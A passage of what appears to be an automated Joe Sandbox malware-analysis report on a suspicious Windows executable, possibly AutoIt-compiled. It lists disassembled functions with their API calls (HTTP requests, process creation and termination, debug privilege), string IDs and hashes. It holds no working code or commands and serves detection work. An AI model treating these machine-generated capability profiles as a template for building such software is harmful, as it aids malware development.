                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                • API String ID: 1924731296-2107944366
                                                                                • Opcode ID: e0709253ea41fba54988ca76c7fb7ea8b9b38efedf0b895731e36ccf47dbb8c5
                                                                                • Instruction ID: 4a589d17766bf8b15095da56b920807fca786dc1732ffac9996345c5dab5964a
                                                                                • Opcode Fuzzy Hash: e0709253ea41fba54988ca76c7fb7ea8b9b38efedf0b895731e36ccf47dbb8c5
                                                                                • Instruction Fuzzy Hash: 97519970204304EFE714EF24DC9AF6A77E4EB88314F40892DF5959B2E2DB789954CB62
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007745FF
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0077462B
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0077466D
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00774682
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0077468F
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007746BF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00774706
                                                                                  • Part of subcall function 00775052: GetLastError.KERNEL32(?,?,007743CC,00000000,00000000,00000001), ref: 00775067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                • String ID:
                                                                                • API String ID: 1241431887-3916222277
                                                                                • Opcode ID: a43e09cb1bbd4aeb170cc80c32e1e35dc78d309a20eae42baf9ccc96a5c00be1
                                                                                • Instruction ID: 51a9d48b56a7ce851697bec4ef3ce21d388d0b35fa1c044a83e3847d58d85d62
                                                                                • Opcode Fuzzy Hash: a43e09cb1bbd4aeb170cc80c32e1e35dc78d309a20eae42baf9ccc96a5c00be1
                                                                                • Instruction Fuzzy Hash: 0A417CB1501219BFEF159F60CC89FBA77ACFF09394F008126FA09DA151D7B89D448BA4
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007BDC00), ref: 0077B715
                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007BDC00), ref: 0077B749
                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0077B8C1
                                                                                • SysFreeString.OLEAUT32(?), ref: 0077B8EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                • String ID:
                                                                                • API String ID: 560350794-0
                                                                                • Opcode ID: 146b48f70974c279b4db5642e76f7710b4df13dec79fb194ec65a855e7017c38
                                                                                • Instruction ID: c1dd4310f622e087bc44e23ef5b15c15eb01e2d64c2ece0dc66923dce82ddf17
                                                                                • Opcode Fuzzy Hash: 146b48f70974c279b4db5642e76f7710b4df13dec79fb194ec65a855e7017c38
                                                                                • Instruction Fuzzy Hash: 19F12A71A00209EFCF14DF94C888EAEB7B9FF89355F108459F919AB250DB35AE45CB90
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 007824F5
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00782688
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007826AC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007826EC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0078270E
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0078286F
                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007828A1
                                                                                • CloseHandle.KERNEL32(?), ref: 007828D0
                                                                                • CloseHandle.KERNEL32(?), ref: 00782947
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                • String ID:
                                                                                • API String ID: 4090791747-0
                                                                                • Opcode ID: ac477ec7d9e2ff385c92b25d9fa7f35dfbd6e7de00fff47845bb1bdcff340bd0
                                                                                • Instruction ID: 9f771828b1f213a55f6165b9c3912cb5cd76d0b05db844bdb357d9e2e3c68b34
                                                                                • Opcode Fuzzy Hash: ac477ec7d9e2ff385c92b25d9fa7f35dfbd6e7de00fff47845bb1bdcff340bd0
                                                                                • Instruction Fuzzy Hash: FAD1C031644300DFCB15EF24C495A6EBBE5BF84310F14845DF99A9B2A2DB39EC41CB52
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0078B3F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: 4ba67a1687d52cccffcdda5a06cd7879e8533d97b42a297e69a45306cc96c0af
                                                                                • Instruction ID: 2e2db08afa2003672943f4bcddef8580b28985b4a54857984b9cf31d15e691c6
                                                                                • Opcode Fuzzy Hash: 4ba67a1687d52cccffcdda5a06cd7879e8533d97b42a297e69a45306cc96c0af
                                                                                • Instruction Fuzzy Hash: 2D519030580244FBEF34AF28CCCABAD3B64EB05364F644011F619D66E2C77DE9549B51
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0079DB1B
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0079DB3C
                                                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0079DB51
                                                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0079DB6E
                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0079DB95
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0073A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0079DBA0
                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0079DBBD
                                                                                • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0073A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0079DBC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: 0faed84ddbd3bbb85970c4ed6cf2154a43a467cda35755c9746aa502c6fc1421
                                                                                • Instruction ID: 7574ba4cc4ce103db6e48b6be7466e04426bf2920ab16e1db98f3c3bf543e08f
                                                                                • Opcode Fuzzy Hash: 0faed84ddbd3bbb85970c4ed6cf2154a43a467cda35755c9746aa502c6fc1421
                                                                                • Instruction Fuzzy Hash: 62518B70600208EFEF24DF68DC86FAA37B9EB48350F104519F9469B6D1D7B8AD80CB50
                                                                                APIs
                                                                                  • Part of subcall function 00766EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00765FA6,?), ref: 00766ED8
                                                                                  • Part of subcall function 00766EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00765FA6,?), ref: 00766EF1
                                                                                  • Part of subcall function 007672CB: GetFileAttributesW.KERNEL32(?,00766019), ref: 007672CC
                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 007675CA
                                                                                • _wcscmp.LIBCMT ref: 007675E2
                                                                                • MoveFileW.KERNEL32(?,?), ref: 007675FB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                • String ID:
                                                                                • API String ID: 793581249-0
                                                                                • Opcode ID: 3fa8ccde6bf65fa3928e05405525c4da118cb68f8831a39934493df04bc92924
                                                                                • Instruction ID: f8b1d49cb43de4066cb6fffce07dda0749eb325aa75ed4fc1bc39d0998be653a
                                                                                • Opcode Fuzzy Hash: 3fa8ccde6bf65fa3928e05405525c4da118cb68f8831a39934493df04bc92924
                                                                                • Instruction Fuzzy Hash: E65142B2A092199EDF54EB94D885DDD73BCAF08354F00409AFA06E3541EB7896C9CF70
                                                                                APIs
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0079DAD1,00000004,00000000,00000000), ref: 0073EAEB
                                                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0079DAD1,00000004,00000000,00000000), ref: 0073EB32
                                                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0079DAD1,00000004,00000000,00000000), ref: 0079DC86
                                                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0079DAD1,00000004,00000000,00000000), ref: 0079DCF2
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: 84f1b80a77cd5061dce6d36e4993ce5cfa28fe0b7136e0148a1858008ad3b301
                                                                                • Instruction ID: b69762127346996f42cf3551c838f69a85e7fb3d02a63e8c14e9a16265664a35
                                                                                • Opcode Fuzzy Hash: 84f1b80a77cd5061dce6d36e4993ce5cfa28fe0b7136e0148a1858008ad3b301
                                                                                • Instruction Fuzzy Hash: 3141DAF0205680DEEB3A4B289D8DE7ABA96AB86304F594409E087469E3C77D7C40D725
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0075B26C
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0075B273
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0075B288
                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 0075B290
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0075B293
                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002), ref: 0075B2A3
                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 0075B2AB
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0075B2AE
                                                                                • CreateThread.KERNEL32(00000000,00000000,0075B2D4,00000000,00000000,00000000), ref: 0075B2C8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: 62d2db6507bb194490e6c35c3600d0a87d04224b90ccf2a0bb067f9e0322873c
                                                                                • Instruction ID: 5d4742ba04fbcf6ce2d0e4a96fd7b67ca9f1f79feced82800cb6cc453fd59d45
                                                                                • Opcode Fuzzy Hash: 62d2db6507bb194490e6c35c3600d0a87d04224b90ccf2a0bb067f9e0322873c
                                                                                • Instruction Fuzzy Hash: B201BFB5240308BFEB20ABA5DC4DF6B7BACEB89711F018411FA05DB591C6B49C00CB65
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: efd1889b790c6973c9644a9e79511e0dcd2b7a6f0e1c2a303361f17160830d0f
                                                                                • Instruction ID: b4d66d10c7b08f9784a3f319df22fc1ff74b782bfd7420ef9c45baafe7fc4efa
                                                                                • Opcode Fuzzy Hash: efd1889b790c6973c9644a9e79511e0dcd2b7a6f0e1c2a303361f17160830d0f
                                                                                • Instruction Fuzzy Hash: 59E1D371A00219AFDF15DFA4D885AAE77B9EF4C394F14802DF909AB281D778AD41CB90
                                                                                APIs
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                  • Part of subcall function 0073C6F4: _wcscpy.LIBCMT ref: 0073C717
                                                                                • _wcstok.LIBCMT ref: 0077184E
                                                                                • _wcscpy.LIBCMT ref: 007718DD
                                                                                • _memset.LIBCMT ref: 00771910
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                • String ID: X$p2}l2}
                                                                                • API String ID: 774024439-327999303
                                                                                • Opcode ID: b13c03270db3661edcf28719eeb3e0ccc693a8341948d98e82791167cfa8b015
                                                                                • Instruction ID: fd653661032e72a838299189695123e83ff571ab129d7989309451134de53142
                                                                                • Opcode Fuzzy Hash: b13c03270db3661edcf28719eeb3e0ccc693a8341948d98e82791167cfa8b015
                                                                                • Instruction Fuzzy Hash: 5AC19071504350DFC724EF28D889A9EB7E0BF95350F41892DF999972A2DB38ED05CB82
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00789B19
                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00789B2D
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00789B47
                                                                                • _wcscat.LIBCMT ref: 00789BA2
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00789BB9
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00789BE7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcscat
                                                                                • String ID: SysListView32
                                                                                • API String ID: 307300125-78025650
                                                                                • Opcode ID: 947dce1c23bc366096fccf13471ac105435d38142cc7444f4c2de5b05c72cdad
                                                                                • Instruction ID: babba1eb5bcf2723f33e7263dac08047d936b4f808c1ba8dff038b21ce47bd3a
                                                                                • Opcode Fuzzy Hash: 947dce1c23bc366096fccf13471ac105435d38142cc7444f4c2de5b05c72cdad
                                                                                • Instruction Fuzzy Hash: E341B570940308EFDB21AF64CC85BEE77B8EF48350F14442AF645A7291D7799D84CB64
                                                                                APIs
                                                                                  • Part of subcall function 00766532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00766554
                                                                                  • Part of subcall function 00766532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00766564
                                                                                  • Part of subcall function 00766532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007665F9
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0078179A
                                                                                • GetLastError.KERNEL32 ref: 007817AD
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007817D9
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00781855
                                                                                • GetLastError.KERNEL32(00000000), ref: 00781860
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00781895
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: aab3a62fbab8b30a71556e7fb8dab5cd9ca4cc9555c4f62c4aaf72e090123734
                                                                                • Instruction ID: c4f393b5eb5d710fac7bc574115377c9b40c6b154fc245c229cf35f419fa3185
                                                                                • Opcode Fuzzy Hash: aab3a62fbab8b30a71556e7fb8dab5cd9ca4cc9555c4f62c4aaf72e090123734
                                                                                • Instruction Fuzzy Hash: 12419B72640204EFDB15EF54C8AAFADB7A5AF44310F058059F9069F283DBBCAD068B91
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 007658B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: b3a2a364bbc0af99b660c38dc8c7782e3a93b8bb12992984f17d42d3a1a870ac
                                                                                • Instruction ID: a2338bca4b1f851294503f2998e95cf620332d4b4d9c22a4f8fc0dc46843f97c
                                                                                • Opcode Fuzzy Hash: b3a2a364bbc0af99b660c38dc8c7782e3a93b8bb12992984f17d42d3a1a870ac
                                                                                • Instruction Fuzzy Hash: D9110D75209B43FEE7155B549C82D6A27AC9F15310F20003BFE02E7681E77CAA0056A5
                                                                                APIs
                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0076A806
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafeVartype
                                                                                • String ID:
                                                                                • API String ID: 1725837607-0
                                                                                • Opcode ID: 47c54723ecc4253faa6d013145e343acd2cf5131171d02a7846f356603cea810
                                                                                • Instruction ID: 6c436935a1c5b98489666328537700d24b955a5bedb1db2b075a62c6a62e6463
                                                                                • Opcode Fuzzy Hash: 47c54723ecc4253faa6d013145e343acd2cf5131171d02a7846f356603cea810
                                                                                • Instruction Fuzzy Hash: 6EC17D75A0421AEFDB14CF98C485BAEB7F4FF09315F24806AEA06E7241D738A941CF91
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00766B63
                                                                                • LoadStringW.USER32(00000000), ref: 00766B6A
                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00766B80
                                                                                • LoadStringW.USER32(00000000), ref: 00766B87
                                                                                • _wprintf.LIBCMT ref: 00766BAD
                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00766BCB
                                                                                Strings
                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00766BA8
                                                                                Memory Dump Source
